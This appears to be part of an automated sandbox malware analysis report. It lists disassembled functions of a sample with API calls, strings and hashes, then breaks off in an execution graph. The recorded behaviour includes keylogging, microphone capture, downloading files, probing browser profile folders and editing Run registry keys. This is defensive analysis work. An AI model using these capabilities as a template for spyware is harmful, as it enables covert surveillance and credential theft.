                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                    Strings
                                    • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: KeepAlive | Enabled | Timeout:
                                    • API String ID: 481472006-1507639952
                                    • Opcode ID: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
                                    • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                    • Opcode Fuzzy Hash: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
                                    • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32 ref: 00416640
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadFileSleep
                                    • String ID: !D@
                                    • API String ID: 1931167962-604454484
                                    • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                    • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                    • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                    • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: | $%02i:%02i:%02i:%03i
                                    • API String ID: 481472006-2430845779
                                    • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                    • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                    • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                    • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: alarm.wav$hYG
                                    • API String ID: 1174141254-2782910960
                                    • Opcode ID: 724a8e5b2a78711fe386ea7d75e966099d3780ec0f3c0cd73080d917fc9e8b87
                                    • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                    • Opcode Fuzzy Hash: 724a8e5b2a78711fe386ea7d75e966099d3780ec0f3c0cd73080d917fc9e8b87
                                    • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                    • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                    • String ID: Online Keylogger Stopped
                                    • API String ID: 1623830855-1496645233
                                    • Opcode ID: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
                                    • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                    • Opcode Fuzzy Hash: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
                                    • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                    Download Yara Rule
                                    APIs
                                    • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferHeaderPrepare
                                    • String ID: XMG
                                    • API String ID: 2315374483-813777761
                                    • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                    • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                    • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                    • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocaleValid
                                    • String ID: IsValidLocaleName$JD
                                    • API String ID: 1901932003-2234456777
                                    • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                    • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                    • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                    • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                    • API String ID: 1174141254-4188645398
                                    • Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                    • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                    • Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                    • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                    • API String ID: 1174141254-2800177040
                                    • Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                    • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                    • Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                    • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: AppData$\Opera Software\Opera Stable\
                                    • API String ID: 1174141254-1629609700
                                    • Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                    • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                    • Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                    • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyState.USER32(00000011), ref: 0040B64B
                                      • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                      • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                      • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                      • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                      • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                    • String ID: [AltL]$[AltR]
                                    • API String ID: 2738857842-2658077756
                                    • Opcode ID: 812230f2851c1f53bb267e032c67d7b388825b52a5818c82693134c1319f806e
                                    • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                    • Opcode Fuzzy Hash: 812230f2851c1f53bb267e032c67d7b388825b52a5818c82693134c1319f806e
                                    • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                    • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: uD
                                    • API String ID: 0-2547262877
                                    • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                    • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                    • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                    • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: !D@$open
                                    • API String ID: 587946157-1586967515
                                    • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                    • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                    • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                    • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyState.USER32(00000012), ref: 0040B6A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State
                                    • String ID: [CtrlL]$[CtrlR]
                                    • API String ID: 1649606143-2446555240
                                    • Opcode ID: 5066be23c52cfaa6c6245271f0373fbb1ceb4cf0ed24aba14fe9ece54d79b194
                                    • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                    • Opcode Fuzzy Hash: 5066be23c52cfaa6c6245271f0373fbb1ceb4cf0ed24aba14fe9ece54d79b194
                                    • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: ,kG$0kG
                                    • API String ID: 1881088180-2015055088
                                    • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                    • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                    • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                    • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                                    • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteOpenValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    • API String ID: 2654517830-1051519024
                                    • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                    • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                    • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteDirectoryFileRemove
                                    • String ID: pth_unenc
                                    • API String ID: 3325800564-4028850238
                                    • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                    • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                    • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                    • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ObjectProcessSingleTerminateWait
                                    • String ID: pth_unenc
                                    • API String ID: 1872346434-4028850238
                                    • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                    • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                    • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                    • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                    • GetLastError.KERNEL32 ref: 00440D35
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast
                                    • String ID:
                                    • API String ID: 1717984340-0
                                    • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                    • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                    • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                    • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                    • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                    • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastRead
                                    • String ID:
                                    • API String ID: 4100373531-0
                                    • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                    • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                    • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                    • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:1.2%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:555
                                    Total number of Limit Nodes:10
                                    execution_graph 47111 434887 47112 434893 ___scrt_is_nonwritable_in_current_image 47111->47112 47137 434596 47112->47137 47114 43489a 47116 4348c3 47114->47116 47432 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47114->47432 47124 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47116->47124 47433 444251 5 API calls _ValidateLocalCookies 47116->47433 47118 4348dc 47120 4348e2 ___scrt_is_nonwritable_in_current_image 47118->47120 47434 4441f5 5 API calls _ValidateLocalCookies 47118->47434 47121 434962 47148 434b14 47121->47148 47124->47121 47435 4433e7 35 API calls 6 library calls 47124->47435 47132 43498e 47134 434997 47132->47134 47436 4433c2 28 API calls _Atexit 47132->47436 47437 43470d 13 API calls 2 library calls 47134->47437 47138 43459f 47137->47138 47438 434c52 IsProcessorFeaturePresent 47138->47438 47140 4345ab 47439 438f31 10 API calls 4 library calls 47140->47439 47142 4345b0 47143 4345b4 47142->47143 47440 4440bf 47142->47440 47143->47114 47146 4345cb 47146->47114 47506 436e90 47148->47506 47151 434968 47152 4441a2 47151->47152 47508 44f059 47152->47508 47154 4441ab 47155 434971 47154->47155 47512 446815 35 API calls 47154->47512 47157 40e9c5 47155->47157 47514 41cb50 LoadLibraryA GetProcAddress 47157->47514 47159 40e9e1 GetModuleFileNameW 47519 40f3c3 47159->47519 47161 40e9fd 47534 4020f6 47161->47534 47164 4020f6 28 API calls 47165 40ea1b 47164->47165 47540 41be1b 47165->47540 47169 40ea2d 47566 401e8d 47169->47566 47171 40ea36 47172 40ea93 47171->47172 47173 40ea49 47171->47173 47572 401e65 22 API calls 47172->47572 47596 40fbb3 116 API calls 47173->47596 47176 40ea5b 47597 401e65 22 API calls 47176->47597 47177 40eaa3 47573 401e65 22 API calls 47177->47573 47179 40ea67 47598 410f37 36 API calls __EH_prolog 47179->47598 47181 40eac2 47574 40531e 28 API calls 47181->47574 47184 40ead1 47575 406383 28 API calls 47184->47575 47185 40ea79 47599 40fb64 77 API calls 47185->47599 47188 40eadd 47576 401fe2 47188->47576 47189 40ea82 47600 40f3b0 70 API calls 47189->47600 47195 401fd8 11 API calls 47197 40eefb 47195->47197 47196 401fd8 11 API calls 47198 40eafb 47196->47198 47427 4432f6 GetModuleHandleW 47197->47427 47588 401e65 22 API calls 47198->47588 47200 40eb04 47589 401fc0 28 API calls 47200->47589 47202 40eb0f 47590 401e65 22 API calls 47202->47590 47204 40eb28 47591 401e65 22 API calls 47204->47591 47206 40eb43 47207 40ebae 47206->47207 47601 406c1e 28 API calls 47206->47601 47592 401e65 22 API calls 47207->47592 47210 40eb70 47211 401fe2 28 API calls 47210->47211 47212 40eb7c 47211->47212 47213 401fd8 11 API calls 47212->47213 47216 40eb85 47213->47216 47214 40ec02 47593 40d069 47214->47593 47215 40ebbb 47215->47214 47603 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47215->47603 47602 413549 RegOpenKeyExA RegQueryValueExA RegCloseKey 47216->47602 47218 40ec08 47219 40ea8b 47218->47219 47605 41b2c3 33 API calls 47218->47605 47219->47195 47222 40eba4 47222->47207 47224 40f34f 47222->47224 47688 4139a9 30 API calls 47224->47688 47225 40ec23 47227 40ec76 47225->47227 47606 407716 RegOpenKeyExA RegQueryValueExA RegCloseKey 47225->47606 47226 40ebe6 47226->47214 47604 4139a9 30 API calls 47226->47604 47611 401e65 22 API calls 47227->47611 47232 40ec7f 47240 40ec90 47232->47240 47241 40ec8b 47232->47241 47233 40ec3e 47235 40ec42 47233->47235 47236 40ec4c 47233->47236 47234 40f365 47689 412475 65 API calls ___scrt_fastfail 47234->47689 47607 407738 30 API calls 47235->47607 47609 401e65 22 API calls 47236->47609 47613 